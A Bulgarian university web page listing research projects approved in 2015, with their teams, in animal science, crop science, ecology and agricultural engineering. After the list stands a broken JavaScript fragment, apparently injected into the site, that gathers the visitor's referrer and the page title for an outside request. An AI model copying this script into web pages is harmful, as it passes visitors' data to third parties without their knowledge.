Утвърдени научни проекти 2015 г.

3ОУП/15– „Изпълнение на дейности за провеждане на качествени и конкурентноспособни изследвания в НИЛ на АФ при ТРУ, чрез доокомплектоване на аналитична апаратура“- Проф. дсн Гюрга Михайлова

1.Ж.15– „Използване на фуражи с различно белтъчно съотношение в аквапонна система“- ас. д-р Стефка Стоянова

2.Ж.15– „Проучване на влиянието на проточността на водата в аквапонна рециркулационна система“- гл. ас. д-р Ивайло Сираков

3.Ж.15– „Изследване влиянието на елементи от околната среда върху етологични и хематологични показатели на кози от Саанската порода“- проф. д-р Иван Върляков; доц. д-р Веселин Радев; гл. ас. Тодор Славов; доц. д-р Румен Бинев; докторант Ваня Маруцова; доц. д-р Димитър Панайотов; доц. д-р Радослав Михайлов; студент Георги Гърбев; студент Георги Николов

4.Ж.15– „Проучване възможностите за създаване на аутосексинови Великденски носачки. Яйчна продуктивност и качествени характеристики на яйцата получени от тях“-    доц. дн Атанас Генчев; докторант Христо Луканов; студент Леман Якимова; студент Еркан Халил; студент Нериме Исмаил

5.Ж.15– „Изпитване на породи от BOMBYX MORI L. по отношение възприемчивост към изкуствена храна с понижено съдържание на черничево брашно“- доц. д-р Михаил Панайотов- 29.5т – 1115.98

6.Ж.15– „Проучване състава на млякото на местни кози и техните кръстоски с Англо – нубийската порода“    гл. ас. д-р Дарина Памукова  

7.Ж.15– „Определяне на смилаемостта и хранителната стойност на нови протеинови източници за преживни животни“- доц. д-р Ганчо Ганчев; проф. д-р Димо Гиргинов; доц. д-р Веселин Радев; студент Петър Христов

8.Ж.15– „Анализ на рибовъдните показатели при различни технологии за отглеждане на дъгова пъстърва (Oncorhynchus mykiss)“- проф. д-р Йордан Стайков; гл. ас. д-р Ивайло Сираков; ас. д-р Галин Николов; ас. Георги Желязков; ас. д-р Стефка Стоянова; студент Александър Господинов; студент Владимир Панчев

9.Ж.15– „Физико-химични свойства, органолептични и технологични качества на малотрайни варено – пушени колбаси – наденици, произведени с различно количество механично отделено птиче месо и пилешка кожна емулсия“- доц. д-р Стефан Рибарски; ас. Иван Пенчев; докторант Златин Златев; студент Бончо Бонев

10.Ж.15– „Проучване върху продуктивните признаци и някои морфологични особености на вимето от породата Лакон в България“- доц. д-р Димитър Панайотов; доц. д-р Тодор Илиев; гл. ас. д-р Тодор Славов; докторант Ваня Маруцова; студент Георги Николов

11.Ж.15– „Експериментиране на нови средства за борба с репродуктивния синдром М74 при пъстървови риби в условия на замърсяване с фунгицида Манкозеб, съдържащ тежките метали манган и цинк“- проф. дсн Васил Атанасов; ас. д-р Милена Цанова; ас. Елица Вълкова; гл. ас. д-р Димитринка Запрянова; гл. ас. д-р Георги Беев; ас. д-р Тончо Динев; студент Борис Кръстев; студент Желязко Димитров; доц. д-р Ботьо Захаринов

12.Ж.15– „Проучване хигиенното поведение на медоносната пчела (Apis mellifera L.) в различни региони в България“- доц. дн Иванка Желязкова; гл. ас. Росица Шумкова; ас. Свилен Лазаров; студент Йоана Иванова; студент Хюлия Вели

13.Ж.15– „Изследване на хранителната стойност на нови протеинови източници за животновъдството в България“- проф. дн Атанас Илчев; гл. ас. д-р Крум Неделков; студент Петър Христов; студент Стефан Господинов

14.Ж.15– „Проучване на генетичната структура на инбредни и аутбредни популации зайци от породата Бял новозеландски по ДНК локусите на растежен хормон (GH) и миостатин (MSTN)“- проф. дсн Светлин Танчев; ас. д-р Деяна Христова; ас. Красимир Великов; докторант Христо Христов; студент Петър Гончев

1.Р.15– „Ефективност и риск при системно минерално хранене на твърда пшеница“- доц. д-р Галя Панайотова; доц. д-р Светла Костадинова; ас. Любов Плешкуца; ас. д-р Младен Алмалиев; докторант Стефка Стефанова; студент Димитрина Бабова

2.Р.15– „Проучване ефекасността на вегетационни противошироколистни хербициди и тяхната селективност към различни сортове памук“- доц. д-р Грози Делчев; доц. д-р Галя Панайотова; гл. ас. д-р Антония Стоянова; гл. ас. Митко Георгиев; ас. Теодора Баракова; ас. Ангелина Мухова; студент Симона Иванова; студент Евелина Георгиева; студент Мариана Маркова

3.Р.15– „Възможности за ранна диагностика на мана Pseudoperonospora cubenis по крастивици чрез Vis-NIRS спектроскопия“- доц. д-р Стефка Атанасова; доц. д-р Николай Вълчев; ас. д-р Димитър Йоргов; проф. д-р Стойка Машева; Цветана Лазарова; студент Рени Цветкова

4.Р.15– „Проучване на нови технологии за борба с плевелите и влиянието им върху продуктивността и химичния състав при маслодаен слънчоглед и царевица за зърно“- доц. д-р Ценка Желязкова; доц. д-р Грози Делчев; доц. д-р Сашка Чобанова; ас. Милена Радевска; ас. Теодора Баракова; студент Светослав Петров; студент Диан Дочев        

5.Р.15– „Комплексно популационно проучване на род Salsola L. (вълмо) в България“- доц. д-р Нели Грозева; гл. ас. д-р Мима Тодорова; ас. Мария Грджикова; гл. ас. д-р Димитринка Запрянова; студент Камелия Вълкова; студент Маргарита Петкова            

6.Р.15– „Изследване влиянието на някои листни торове върху продуктивността на обикновената пшеница“- гл. ас. д-р Антония Стоянова        

7.Р.15– „Проучване промените в агрохимичните свойства на излужена смолница (Pellic Vertisols) в района на град Чирпан под влияние на минералното торене“- ас. Любов Плешкуца    

8.Р.15– „Съдържание на органични, минерални, и биологично-активни вещества в Български ранилист (Betonica bulgarica Deg. et Neic) като инградиент на естествени тревни ливадно-пасищни асоциации“- ас. Мария Герджикова

9.Р.15– „Използване на хранителни в-ва от отпадни води в аквакултурата, чрез култивиране на зеленчуци“- гл. ас. д-р Катя Величкова            

1.Е.15– „Изолиране на млечнокисели бактерии от различни източници“- проф. дсн Стефан Денев; гл. ас. д-р Георги Беев; ас. д-р Тончо Динев; ас. Елица Вълкова; д-р Михаела Михайлова; студент Ралица Иванова

2.Е.15– „Проучване върху табанидната фауна на Рила планина – състав, доминантна структура и зоогеографски аспекти“- доц. д-р Диана Ганева; студент Кольо Райков; студент Симеон Косев

3.Е.15– „Биоакумулация и разпределение на тежки метали и металоиди в организма на гръбначни животни от района на Сърнена Средна гора“- доц. д-р Диян Георгиев; гл. ас. д-р Евгений Райчев; гл. ас. д-р Лилко Каменов; ас. Станислава Пеева; докторант Силвия Калчева; студент Живко Димитров

4.Е.15– „Проучване върху ракообразни (Branchiopoda: Anostracaи Malacostraca: Amphipoda) като междинни гостоприемници на хелминти от някои езера по Южното Черноморско крайбрежие“- доц. д-р Златка Димитрова; ас. Маргарита Маринова; студент Дияна Бонева

5.Е.15– „Инвентаризация на хименоле-пидиднитецестоди(Cyclophillidea: Hymenolepididae) по водоплаващи птици от сем. Anatidae (Aves: Anseriformes) в България“- ас. Маргарита Маринова           

1.АИ.15– „Изследване и анализ на структурата на времето за разтоварване на бункерите на зърнокомбайните в спряло положение“- доц. д-р Неделчо Делчев; доц. д-р Красимир Трендафилов; ас. Галин Тиханов; ас. Йордан Стоянов; студент Станимира Данкова

2.АИ.15– „Изследване на функционалните зависимости между механичните показатели и пулсационните характеристики на различните видове доилни апарати чрез дву- и четириканални пулсографи“- доц. д-р Веселин Влашев; доц. д-р Кънчо Пейчев; доц. д-р Тодор Стоянчев; ас. д-р Галина Динева; ас. Димитър Георгиев; ас. Лъчезар Цанов; студент Таня Николова

3.АИ.15– „Сравнителен анализ на строителни и технико-технологични параметри на различни видове доилни зали за крави“- доц. д-р Кънчо Пейчев; доц. д-р Ваня Димова; проф. дсн Живка Герговска; доц. д-р Рашко Георгиев; доц. д-р Йовка Попова; доц. д-р Красимира Узунова; ас. д-р Галина Динева; ас. Димитър Георгиев; докторант Ивайло Маринов; студент Ваня Стоянова

 

(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();

Comments are closed